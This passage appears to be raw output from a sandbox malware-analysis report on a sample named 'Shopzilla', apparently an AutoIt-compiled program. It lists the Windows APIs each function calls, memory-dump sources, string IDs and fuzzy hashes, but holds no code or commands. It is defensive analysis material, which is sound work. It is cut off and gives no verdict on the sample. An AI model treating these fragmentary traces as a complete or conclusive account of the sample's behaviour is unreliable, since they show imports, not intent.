                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C2CABE
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C2CAE1
                                              • _wcscat.LIBCMT ref: 00C2CB11
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C2CB28
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00C2CB41
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00C2CB58
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00C2CB7A
                                              • DragFinish.SHELL32(?), ref: 00C2CB81
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C2CC74
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 169749273-3440237614
                                              • Opcode ID: 7bfd01963959e20e389ef95608e992e65803be97f77f8d3bba84237834f4359c
                                              • Instruction ID: da97361d642c89f354ccf2b76de012a91c5a81636c20fb8ced9d6fd7502eecfb
                                              • Opcode Fuzzy Hash: 7bfd01963959e20e389ef95608e992e65803be97f77f8d3bba84237834f4359c
                                              • Instruction Fuzzy Hash: 0D616972108300AFC711EF64DC95E9FBBF8EF89710F100A2DF595921A1DB719A49CB92
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00C08187
                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00C08190
                                              • VariantClear.OLEAUT32(00000000), ref: 00C0819C
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C0828A
                                              • __swprintf.LIBCMT ref: 00C082BA
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00C082E6
                                              • VariantInit.OLEAUT32(?), ref: 00C08397
                                              • SysFreeString.OLEAUT32(?), ref: 00C0842B
                                              • VariantClear.OLEAUT32(?), ref: 00C08485
                                              • VariantClear.OLEAUT32(?), ref: 00C08494
                                              • VariantInit.OLEAUT32(00000000), ref: 00C084D2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 3730832054-3931177956
                                              • Opcode ID: 755cdaf442a6b9e29b76e528dba5b312a9703fafac15eaf3b0037d1ec797620d
                                              • Instruction ID: 72d326f68f0d5716289416558a2531e4dcb1bd9c484a4e09bbf2dc5fc7feaebf
                                              • Opcode Fuzzy Hash: 755cdaf442a6b9e29b76e528dba5b312a9703fafac15eaf3b0037d1ec797620d
                                              • Instruction Fuzzy Hash: 3DD11131A00616DBDB209FA6D854B7DB7B8BF05700F20C469E4A5AB2C1CF74ED49DBA0
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00C24829
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C24874
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: 462261f216bb2200a1e4aa93435ee19d9888f4cb8c03829c3071f51fe155d796
                                              • Instruction ID: b3a6b89712b945932161ea67f0ab97e4ec112611019d72971f2e54864effd13b
                                              • Opcode Fuzzy Hash: 462261f216bb2200a1e4aa93435ee19d9888f4cb8c03829c3071f51fe155d796
                                              • Instruction Fuzzy Hash: 9C918E742147119FCB08EF20C451A7EB7E5AF94354F4089ACF8A65B7A2CB71ED4ACB81
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C2BCA1
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C295AF), ref: 00C2BCFD
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C2BD36
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C2BD79
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C2BDB0
                                              • FreeLibrary.KERNEL32(?), ref: 00C2BDBC
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C2BDCC
                                              • DestroyIcon.USER32(?,?,?,?,?,00C295AF), ref: 00C2BDDB
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C2BDF8
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C2BE04
                                                • Part of subcall function 00BC305F: __wcsicmp_l.LIBCMT ref: 00BC30E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 1212759294-1154884017
                                              • Opcode ID: a8126ba410dc3390fd0c2d41d0a71e2a16947086b03d64f6f669114c53a9ae69
                                              • Instruction ID: 30935b5ce2529ad6a645e6f90d2feb66183ea8a82f8c2e657740f8dcced7f9fb
                                              • Opcode Fuzzy Hash: a8126ba410dc3390fd0c2d41d0a71e2a16947086b03d64f6f669114c53a9ae69
                                              • Instruction Fuzzy Hash: F4610072500625BAEB14DF64EC41FFE77A8FB08710F20425AF925D64D1DBB4AE90CBA0
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C0A12F
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C0A150
                                              • __swprintf.LIBCMT ref: 00C0A1A9
                                              • __swprintf.LIBCMT ref: 00C0A1C2
                                              • _wprintf.LIBCMT ref: 00C0A269
                                              • _wprintf.LIBCMT ref: 00C0A287
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-3080491070
                                              • Opcode ID: 1335d8d9809777cb7a9a74d7a6a8942a2b05d04a6a294101f433b4f0a4d76de3
                                              • Instruction ID: 08900aff941809c6b3bc64d2cdf1027efff8ee66bc608817f80707ff72d379a0
                                              • Opcode Fuzzy Hash: 1335d8d9809777cb7a9a74d7a6a8942a2b05d04a6a294101f433b4f0a4d76de3
                                              • Instruction Fuzzy Hash: E8519C71900219ABCF14EBE4CD66EEEB7B8EF14341F5005A5F805A20A1EB712F98CB61
                                              APIs
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • CharLowerBuffW.USER32(?,?), ref: 00C0A87B
                                              • GetDriveTypeW.KERNEL32 ref: 00C0A8C8
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0A910
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0A947
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0A975
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: f739950343b2b132626f672e6f632e66718a50142eab0b5ef4935fdd5b51dc9b
                                              • Instruction ID: 565aeea0ebe87d044e134beffcd58aa7c395fc2a22aabf6b30a567b02d62d359
                                              • Opcode Fuzzy Hash: f739950343b2b132626f672e6f632e66718a50142eab0b5ef4935fdd5b51dc9b
                                              • Instruction Fuzzy Hash: C2515F711043059FC700EF15C8919AAB7E8FF84758F5089ACF89957291DB71EE09CB92
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C0A6BF
                                              • __swprintf.LIBCMT ref: 00C0A6E1
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C0A71E
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C0A743
                                              • _memset.LIBCMT ref: 00C0A762
                                              • _wcsncpy.LIBCMT ref: 00C0A79E
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C0A7D3
                                              • CloseHandle.KERNEL32(00000000), ref: 00C0A7DE
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00C0A7E7
                                              • CloseHandle.KERNEL32(00000000), ref: 00C0A7F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: f4b71b5c0e2524d3d20a84ecf8e30ea108c858e467d8f0319a6befb0f87d4d91
                                              • Instruction ID: e2c1013fe862b60a3630f69a831ee3bc7d842b121cb6a965623f071165e91ac1
                                              • Opcode Fuzzy Hash: f4b71b5c0e2524d3d20a84ecf8e30ea108c858e467d8f0319a6befb0f87d4d91
                                              • Instruction Fuzzy Hash: D0316172510219ABDB219FA4DC49FAF77BCEF89700F2041A6F919D61A0EB709784CB25
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 00C0DEC0
                                              • _wcscat.LIBCMT ref: 00C0DED8
                                              • _wcscat.LIBCMT ref: 00C0DEEA
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C0DEFF
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0DF13
                                              • GetFileAttributesW.KERNEL32(?), ref: 00C0DF2B
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C0DF45
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C0DF57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: 681d22254069e2d17b34767598e808a06ee83454e2fa889cb1fef11dc79e8374
                                              • Instruction ID: caf12cf7d3163aca7bde0cf07d537aa594529c1a445ce7ddc7c2161befb80348
                                              • Opcode Fuzzy Hash: 681d22254069e2d17b34767598e808a06ee83454e2fa889cb1fef11dc79e8374
                                              • Instruction Fuzzy Hash: 018171715043059FCB64EFA4C844A6AB7E8EB99310F14886EF4A6CB291E730DE45CB52
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C2C61F
                                              • GetFocus.USER32 ref: 00C2C62F
                                              • GetDlgCtrlID.USER32(00000000), ref: 00C2C63A
                                              • _memset.LIBCMT ref: 00C2C765
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C2C790
                                              • GetMenuItemCount.USER32(?), ref: 00C2C7B0
                                              • GetMenuItemID.USER32(?,00000000), ref: 00C2C7C3
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C2C7F7
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C2C83F
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C2C877
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C2C8AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: 5ed85efef40b8ed388e8fe2787155e70374ef4bc01fd4e344efa25ab57e5db7f
                                              • Instruction ID: 9823eda44ee4c629b94b2a3ba978b6ce15ee27ffa96dd455434ff50fa6f7ac17
                                              • Opcode Fuzzy Hash: 5ed85efef40b8ed388e8fe2787155e70374ef4bc01fd4e344efa25ab57e5db7f
                                              • Instruction Fuzzy Hash: B1817B716083219FD720DF14E884A6FBBE8FB88714F10892EF9A593691D770D945CFA2
                                              APIs
                                                • Part of subcall function 00BF8C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF8C1F
                                                • Part of subcall function 00BF8C03: GetLastError.KERNEL32(?,00BF86E3,?,?,?), ref: 00BF8C29
                                                • Part of subcall function 00BF8C03: GetProcessHeap.KERNEL32(00000008,?,?,00BF86E3,?,?,?), ref: 00BF8C38
                                                • Part of subcall function 00BF8C03: HeapAlloc.KERNEL32(00000000,?,00BF86E3,?,?,?), ref: 00BF8C3F
                                                • Part of subcall function 00BF8C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF8C56
                                                • Part of subcall function 00BF8CA0: GetProcessHeap.KERNEL32(00000008,00BF86F9,00000000,00000000,?,00BF86F9,?), ref: 00BF8CAC
                                                • Part of subcall function 00BF8CA0: HeapAlloc.KERNEL32(00000000,?,00BF86F9,?), ref: 00BF8CB3
                                                • Part of subcall function 00BF8CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BF86F9,?), ref: 00BF8CC4
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BF8911
                                              • _memset.LIBCMT ref: 00BF8926
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BF8945
                                              • GetLengthSid.ADVAPI32(?), ref: 00BF8956
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00BF8993
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BF89AF
                                              • GetLengthSid.ADVAPI32(?), ref: 00BF89CC
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BF89DB
                                              • HeapAlloc.KERNEL32(00000000), ref: 00BF89E2
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BF8A03
                                              • CopySid.ADVAPI32(00000000), ref: 00BF8A0A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BF8A3B
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BF8A61
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BF8A75
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 138bb0c5eca3894a81b64e8a3a9483b9bd66d022d75f2873b5b924ab0476eec0
                                              • Instruction ID: 8b3d6a78b6d47de8c221e838a646db19270093eded3242ec67d41f8d5acadc66
                                              • Opcode Fuzzy Hash: 138bb0c5eca3894a81b64e8a3a9483b9bd66d022d75f2873b5b924ab0476eec0
                                              • Instruction Fuzzy Hash: A8612A71900109AFDF05DF95DC55BBEBBB9FF04700F1481AAEA15A7290DB359A09CB60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00C1783E
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C1784A
                                              • CreateCompatibleDC.GDI32(?), ref: 00C17856
                                              • SelectObject.GDI32(00000000,?), ref: 00C17863
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C178B7
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C178F3
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C17917
                                              • SelectObject.GDI32(00000006,?), ref: 00C1791F
                                              • DeleteObject.GDI32(?), ref: 00C17928
                                              • DeleteDC.GDI32(00000006), ref: 00C1792F
                                              • ReleaseDC.USER32(00000000,?), ref: 00C1793A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: a05d5c92f419805b741d16c5f18f8c7d4e2375cb9afba0a6aff006d0c4501de4
                                              • Instruction ID: 62cf1e575bd0596f42ccd3c8b4a1468cecada671bf388062c838e596a5e5f777
                                              • Opcode Fuzzy Hash: a05d5c92f419805b741d16c5f18f8c7d4e2375cb9afba0a6aff006d0c4501de4
                                              • Instruction Fuzzy Hash: C5513972904209EFDB15CFA8CC89FAEBBB9EF49310F14851DF95AA7250D731A940DB60
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C0A341
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 00C0A363
                                              • __swprintf.LIBCMT ref: 00C0A3BC
                                              • __swprintf.LIBCMT ref: 00C0A3D5
                                              • _wprintf.LIBCMT ref: 00C0A48B
                                              • _wprintf.LIBCMT ref: 00C0A4A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              • Opcode ID: 389bb3877b9f57a3c71bc2b8095ca0cde2d042afffd842b434b342b13b6fe1c7
                                              • Instruction ID: 7197333cdcb22d54e60545983107fa50ea8638dd114fddf6f1ebc4d2317a06b6
                                              • Opcode Fuzzy Hash: 389bb3877b9f57a3c71bc2b8095ca0cde2d042afffd842b434b342b13b6fe1c7
                                              • Instruction Fuzzy Hash: 3F51AE71800209ABCF14EBE4CD66EEEB7B8EF04340F5045A5F805A21A1EBB12F58DB61
                                              APIs
                                                • Part of subcall function 00C09387: __time64.LIBCMT ref: 00C09391
                                                • Part of subcall function 00BB4A8C: _fseek.LIBCMT ref: 00BB4AA4
                                              • __wsplitpath.LIBCMT ref: 00C0965C
                                                • Part of subcall function 00BC424E: __wsplitpath_helper.LIBCMT ref: 00BC428E
                                              • _wcscpy.LIBCMT ref: 00C0966F
                                              • _wcscat.LIBCMT ref: 00C09682
                                              • __wsplitpath.LIBCMT ref: 00C096A7
                                              • _wcscat.LIBCMT ref: 00C096BD
                                              • _wcscat.LIBCMT ref: 00C096D0
                                                • Part of subcall function 00C093CD: _memmove.LIBCMT ref: 00C09406
                                                • Part of subcall function 00C093CD: _memmove.LIBCMT ref: 00C09415
                                              • _wcscmp.LIBCMT ref: 00C09617
                                                • Part of subcall function 00C09B5E: _wcscmp.LIBCMT ref: 00C09C4E
                                                • Part of subcall function 00C09B5E: _wcscmp.LIBCMT ref: 00C09C61
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C0987A
                                              • _wcsncpy.LIBCMT ref: 00C098ED
                                              • DeleteFileW.KERNEL32(?,?), ref: 00C09923
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C09939
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C0994A
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C0995C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
